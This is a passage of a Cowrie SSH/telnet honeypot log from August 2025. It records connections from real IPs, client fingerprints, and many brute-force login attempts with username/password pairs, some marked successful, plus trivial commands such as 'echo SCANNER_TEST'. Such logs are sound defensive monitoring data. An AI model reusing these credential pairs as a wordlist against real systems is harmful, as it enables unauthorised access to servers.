penssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:32:22.148384Z","src_ip":"45.88.8.215","session":"bbd3e1e9c855"}
{"eventid":"cowrie.login.success","username":"root","password":"Meghdutt@123","message":"login attempt [root/Meghdutt@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:32:24.199411Z","src_ip":"45.88.8.215","session":"bbd3e1e9c855"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:32:24.618135Z","src_ip":"45.88.8.215","session":"bbd3e1e9c855"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57008,"dst_ip":"1.2.3.4","dst_port":23,"session":"73d3856f42a5","protocol":"telnet","message":"New connection: 212.227.125.160:57008 (1.2.3.4:23) [session: 73d3856f42a5]","sensor":"my-vps","timestamp":"2025-08-26T12:33:36.171719Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:33:36.255597Z","src_ip":"212.227.125.160","session":"73d3856f42a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:33:36.314550Z","src_ip":"212.227.125.160","session":"73d3856f42a5"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T12:33:36.315730Z","src_ip":"212.227.125.160","session":"73d3856f42a5"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T12:33:36.316591Z","src_ip":"212.227.125.160","session":"73d3856f42a5"}
{"eventid":"cowrie.session.connect","src_ip":"59.31.154.104","src_port":59321,"dst_ip":"1.2.3.4","dst_port":23,"session":"e20b01974e48","protocol":"telnet","message":"New connection: 59.31.154.104:59321 (1.2.3.4:23) [session: e20b01974e48]","sensor":"my-vps","timestamp":"2025-08-26T12:35:10.576754Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:35:13.053262Z","src_ip":"79.124.8.120","session":"b0ad0a94ab7a"}
{"eventid":"cowrie.session.closed","duration":180.07808923721313,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:35:13.059173Z","src_ip":"79.124.8.120","session":"b0ad0a94ab7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36408,"dst_ip":"1.2.3.4","dst_port":23,"session":"8dd2e494640b","protocol":"telnet","message":"New connection: 212.227.235.229:36408 (1.2.3.4:23) [session: 8dd2e494640b]","sensor":"my-vps","timestamp":"2025-08-26T12:35:28.944209Z"}
{"eventid":"cowrie.session.closed","duration":31.444658279418945,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:35:42.021340Z","src_ip":"59.31.154.104","session":"e20b01974e48"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61078,"dst_ip":"1.2.3.4","dst_port":22,"session":"4dd87221e0b6","protocol":"ssh","message":"New connection: 217.72.205.35:61078 (1.2.3.4:22) [session: 4dd87221e0b6]","sensor":"my-vps","timestamp":"2025-08-26T12:35:42.481621Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:35:42.482517Z","src_ip":"217.72.205.35","session":"4dd87221e0b6"}
{"eventid":"cowrie.session.closed","duration":30.99230670928955,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:35:59.936435Z","src_ip":"212.227.235.229","session":"8dd2e494640b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59083,"dst_ip":"1.2.3.4","dst_port":23,"session":"aa020e2f4157","protocol":"telnet","message":"New connection: 212.227.125.160:59083 (1.2.3.4:23) [session: aa020e2f4157]","sensor":"my-vps","timestamp":"2025-08-26T12:36:26.477448Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:36:36.325897Z","src_ip":"212.227.125.160","session":"73d3856f42a5"}
{"eventid":"cowrie.session.closed","duration":180.1579611301422,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:36:36.329609Z","src_ip":"212.227.125.160","session":"73d3856f42a5"}
{"eventid":"cowrie.session.closed","duration":12.632125854492188,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:36:39.109508Z","src_ip":"212.227.125.160","session":"aa020e2f4157"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59366,"dst_ip":"1.2.3.4","dst_port":23,"session":"eb6dbea09e9c","protocol":"telnet","message":"New connection: 212.227.125.160:59366 (1.2.3.4:23) [session: eb6dbea09e9c]","sensor":"my-vps","timestamp":"2025-08-26T12:36:39.300665Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43492,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e8971711688","protocol":"ssh","message":"New connection: 212.227.235.229:43492 (1.2.3.4:22) [session: 6e8971711688]","sensor":"my-vps","timestamp":"2025-08-26T12:36:42.897141Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T12:36:42.898140Z","src_ip":"212.227.235.229","session":"6e8971711688"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T12:36:43.026111Z","src_ip":"212.227.235.229","session":"6e8971711688"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu@1234","message":"login attempt [ubuntu/ubuntu@1234] failed","sensor":"my-vps","timestamp":"2025-08-26T12:36:43.578927Z","src_ip":"212.227.235.229","session":"6e8971711688"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"abc123","message":"login attempt [ubuntu/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:36:44.720398Z","src_ip":"212.227.235.229","session":"6e8971711688"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"abcd123","message":"login attempt [ubuntu/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:36:45.850728Z","src_ip":"212.227.235.229","session":"6e8971711688"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"abcd1234","message":"login attempt [ubuntu/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-26T12:36:46.982745Z","src_ip":"212.227.235.229","session":"6e8971711688"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"abc1234","message":"login attempt [ubuntu/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-26T12:36:48.114007Z","src_ip":"212.227.235.229","session":"6e8971711688"}
{"eventid":"cowrie.session.connect","src_ip":"165.227.142.245","src_port":51028,"dst_ip":"1.2.3.4","dst_port":23,"session":"892614f39cd2","protocol":"telnet","message":"New connection: 165.227.142.245:51028 (1.2.3.4:23) [session: 892614f39cd2]","sensor":"my-vps","timestamp":"2025-08-26T12:36:48.778930Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:36:48.863901Z","src_ip":"165.227.142.245","session":"892614f39cd2"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:36:49.245003Z","src_ip":"212.227.235.229","session":"6e8971711688"}
{"eventid":"cowrie.session.closed","duration":2.744605541229248,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:36:51.523427Z","src_ip":"165.227.142.245","session":"892614f39cd2"}
{"eventid":"cowrie.session.connect","src_ip":"165.227.142.245","src_port":51032,"dst_ip":"1.2.3.4","dst_port":23,"session":"6e3db183b66a","protocol":"telnet","message":"New connection: 165.227.142.245:51032 (1.2.3.4:23) [session: 6e3db183b66a]","sensor":"my-vps","timestamp":"2025-08-26T12:36:51.533610Z"}
{"eventid":"cowrie.session.closed","duration":12.789972066879272,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:36:52.090556Z","src_ip":"212.227.125.160","session":"eb6dbea09e9c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59669,"dst_ip":"1.2.3.4","dst_port":23,"session":"82456cc04223","protocol":"telnet","message":"New connection: 212.227.125.160:59669 (1.2.3.4:23) [session: 82456cc04223]","sensor":"my-vps","timestamp":"2025-08-26T12:36:52.279366Z"}
{"eventid":"cowrie.session.closed","duration":1.5520689487457275,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:36:53.085617Z","src_ip":"165.227.142.245","session":"6e3db183b66a"}
{"eventid":"cowrie.session.connect","src_ip":"165.227.142.245","src_port":51034,"dst_ip":"1.2.3.4","dst_port":23,"session":"178806bc5cde","protocol":"telnet","message":"New connection: 165.227.142.245:51034 (1.2.3.4:23) [session: 178806bc5cde]","sensor":"my-vps","timestamp":"2025-08-26T12:36:53.095976Z"}
{"eventid":"cowrie.session.closed","duration":1.175441026687622,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:36:54.271366Z","src_ip":"165.227.142.245","session":"178806bc5cde"}
{"eventid":"cowrie.session.connect","src_ip":"165.227.142.245","src_port":51044,"dst_ip":"1.2.3.4","dst_port":23,"session":"be6c61a599d9","protocol":"telnet","message":"New connection: 165.227.142.245:51044 (1.2.3.4:23) [session: be6c61a599d9]","sensor":"my-vps","timestamp":"2025-08-26T12:36:54.281680Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T12:36:54.323879Z","src_ip":"165.227.142.245","session":"be6c61a599d9"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T12:36:55.464656Z","src_ip":"165.227.142.245","session":"be6c61a599d9"}
{"eventid":"cowrie.session.closed","duration":2.3247947692871094,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:36:56.606408Z","src_ip":"165.227.142.245","session":"be6c61a599d9"}
{"eventid":"cowrie.session.connect","src_ip":"165.227.142.245","src_port":35852,"dst_ip":"1.2.3.4","dst_port":23,"session":"e77db9c3f0f5","protocol":"telnet","message":"New connection: 165.227.142.245:35852 (1.2.3.4:23) [session: e77db9c3f0f5]","sensor":"my-vps","timestamp":"2025-08-26T12:36:56.617317Z"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-26T12:36:56.695549Z","src_ip":"165.227.142.245","session":"e77db9c3f0f5"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T12:36:57.809531Z","src_ip":"165.227.142.245","session":"e77db9c3f0f5"}
{"eventid":"cowrie.session.closed","duration":2.3481249809265137,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:36:58.964639Z","src_ip":"165.227.142.245","session":"e77db9c3f0f5"}
{"eventid":"cowrie.session.connect","src_ip":"165.227.142.245","src_port":35864,"dst_ip":"1.2.3.4","dst_port":23,"session":"e41354d03a89","protocol":"telnet","message":"New connection: 165.227.142.245:35864 (1.2.3.4:23) [session: e41354d03a89]","sensor":"my-vps","timestamp":"2025-08-26T12:36:58.974719Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"VnT3ch@dm1n","message":"login attempt [admin/VnT3ch@dm1n] failed","sensor":"my-vps","timestamp":"2025-08-26T12:36:59.083791Z","src_ip":"165.227.142.245","session":"e41354d03a89"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T12:37:00.225440Z","src_ip":"165.227.142.245","session":"e41354d03a89"}
{"eventid":"cowrie.session.closed","duration":3.392577648162842,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:37:02.367197Z","src_ip":"165.227.142.245","session":"e41354d03a89"}
{"eventid":"cowrie.session.connect","src_ip":"165.227.142.245","src_port":35868,"dst_ip":"1.2.3.4","dst_port":23,"session":"0a9c3f905903","protocol":"telnet","message":"New connection: 165.227.142.245:35868 (1.2.3.4:23) [session: 0a9c3f905903]","sensor":"my-vps","timestamp":"2025-08-26T12:37:02.377489Z"}
{"eventid":"cowrie.login.failed","username":"telnet","password":"telnet","message":"login attempt [telnet/telnet] failed","sensor":"my-vps","timestamp":"2025-08-26T12:37:02.478402Z","src_ip":"165.227.142.245","session":"0a9c3f905903"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T12:37:03.580486Z","src_ip":"165.227.142.245","session":"0a9c3f905903"}
{"eventid":"cowrie.session.closed","duration":2.289987087249756,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:37:04.667411Z","src_ip":"165.227.142.245","session":"0a9c3f905903"}
{"eventid":"cowrie.session.connect","src_ip":"165.227.142.245","src_port":37880,"dst_ip":"1.2.3.4","dst_port":23,"session":"4f617bb3636a","protocol":"telnet","message":"New connection: 165.227.142.245:37880 (1.2.3.4:23) [session: 4f617bb3636a]","sensor":"my-vps","timestamp":"2025-08-26T12:37:04.677756Z"}
{"eventid":"cowrie.login.success","username":"root","password":"86981198","message":"login attempt [root/86981198] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:37:04.746577Z","src_ip":"165.227.142.245","session":"4f617bb3636a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:37:04.767776Z","src_ip":"165.227.142.245","session":"4f617bb3636a"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T12:37:04.821544Z","src_ip":"165.227.142.245","session":"4f617bb3636a"}
{"eventid":"cowrie.session.closed","duration":12.816428184509277,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:37:05.095715Z","src_ip":"212.227.125.160","session":"82456cc04223"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59988,"dst_ip":"1.2.3.4","dst_port":23,"session":"99b56989281a","protocol":"telnet","message":"New connection: 212.227.125.160:59988 (1.2.3.4:23) [session: 99b56989281a]","sensor":"my-vps","timestamp":"2025-08-26T12:37:05.413018Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:37:06.090639Z","src_ip":"165.227.142.245","session":"4f617bb3636a"}
{"eventid":"cowrie.session.closed","duration":1.4184038639068604,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:37:06.096108Z","src_ip":"165.227.142.245","session":"4f617bb3636a"}
{"eventid":"cowrie.session.closed","duration":12.73688530921936,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:37:18.149837Z","src_ip":"212.227.125.160","session":"99b56989281a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60300,"dst_ip":"1.2.3.4","dst_port":23,"session":"bfbf1dc42d5a","protocol":"telnet","message":"New connection: 212.227.125.160:60300 (1.2.3.4:23) [session: bfbf1dc42d5a]","sensor":"my-vps","timestamp":"2025-08-26T12:37:18.401693Z"}
{"eventid":"cowrie.session.closed","duration":12.751148462295532,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:37:31.152746Z","src_ip":"212.227.125.160","session":"bfbf1dc42d5a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60609,"dst_ip":"1.2.3.4","dst_port":23,"session":"55f2db4b8f04","protocol":"telnet","message":"New connection: 212.227.125.160:60609 (1.2.3.4:23) [session: 55f2db4b8f04]","sensor":"my-vps","timestamp":"2025-08-26T12:37:31.453604Z"}
{"eventid":"cowrie.session.closed","duration":12.697113275527954,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:37:44.150652Z","src_ip":"212.227.125.160","session":"55f2db4b8f04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60907,"dst_ip":"1.2.3.4","dst_port":23,"session":"d17bc6890677","protocol":"telnet","message":"New connection: 212.227.125.160:60907 (1.2.3.4:23) [session: d17bc6890677]","sensor":"my-vps","timestamp":"2025-08-26T12:37:44.311661Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57666,"dst_ip":"1.2.3.4","dst_port":22,"session":"2709225add2c","protocol":"ssh","message":"New connection: 212.227.125.160:57666 (1.2.3.4:22) [session: 2709225add2c]","sensor":"my-vps","timestamp":"2025-08-26T12:37:52.710591Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:37:52.722792Z","src_ip":"212.227.125.160","session":"2709225add2c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:37:52.774904Z","src_ip":"212.227.125.160","session":"2709225add2c"}
{"eventid":"cowrie.login.failed","username":"sol","password":"sol","message":"login attempt [sol/sol] failed","sensor":"my-vps","timestamp":"2025-08-26T12:37:53.369785Z","src_ip":"212.227.125.160","session":"2709225add2c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:37:54.421909Z","src_ip":"212.227.125.160","session":"2709225add2c"}
{"eventid":"cowrie.session.closed","duration":12.784322500228882,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:37:57.095919Z","src_ip":"212.227.125.160","session":"d17bc6890677"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32977,"dst_ip":"1.2.3.4","dst_port":23,"session":"bb12aec0cded","protocol":"telnet","message":"New connection: 212.227.125.160:32977 (1.2.3.4:23) [session: bb12aec0cded]","sensor":"my-vps","timestamp":"2025-08-26T12:37:57.348998Z"}
{"eventid":"cowrie.session.closed","duration":12.783954858779907,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:38:10.132835Z","src_ip":"212.227.125.160","session":"bb12aec0cded"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33272,"dst_ip":"1.2.3.4","dst_port":23,"session":"d983a4af4b9e","protocol":"telnet","message":"New connection: 212.227.125.160:33272 (1.2.3.4:23) [session: d983a4af4b9e]","sensor":"my-vps","timestamp":"2025-08-26T12:38:10.331154Z"}
{"eventid":"cowrie.session.closed","duration":12.878424406051636,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:38:23.209624Z","src_ip":"212.227.125.160","session":"d983a4af4b9e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33571,"dst_ip":"1.2.3.4","dst_port":23,"session":"c62172d2c6d5","protocol":"telnet","message":"New connection: 212.227.125.160:33571 (1.2.3.4:23) [session: c62172d2c6d5]","sensor":"my-vps","timestamp":"2025-08-26T12:38:23.424115Z"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":55782,"dst_ip":"1.2.3.4","dst_port":22,"session":"e23d0de24951","protocol":"ssh","message":"New connection: 93.123.109.189:55782 (1.2.3.4:22) [session: e23d0de24951]","sensor":"my-vps","timestamp":"2025-08-26T12:38:24.567251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:38:24.568080Z","src_ip":"93.123.109.189","session":"e23d0de24951"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:38:24.588359Z","src_ip":"93.123.109.189","session":"e23d0de24951"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"vpn","message":"login attempt [vpn/vpn] failed","sensor":"my-vps","timestamp":"2025-08-26T12:38:24.648487Z","src_ip":"93.123.109.189","session":"e23d0de24951"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:38:25.670235Z","src_ip":"93.123.109.189","session":"e23d0de24951"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":26132,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f78fb6fa186","protocol":"ssh","message":"New connection: 212.227.125.160:26132 (1.2.3.4:22) [session: 9f78fb6fa186]","sensor":"my-vps","timestamp":"2025-08-26T12:38:32.112108Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:38:32.113200Z","src_ip":"212.227.125.160","session":"9f78fb6fa186"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":26426,"dst_ip":"1.2.3.4","dst_port":22,"session":"291ab3404598","protocol":"ssh","message":"New connection: 212.227.125.160:26426 (1.2.3.4:22) [session: 291ab3404598]","sensor":"my-vps","timestamp":"2025-08-26T12:38:32.228706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:38:32.229428Z","src_ip":"212.227.125.160","session":"291ab3404598"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@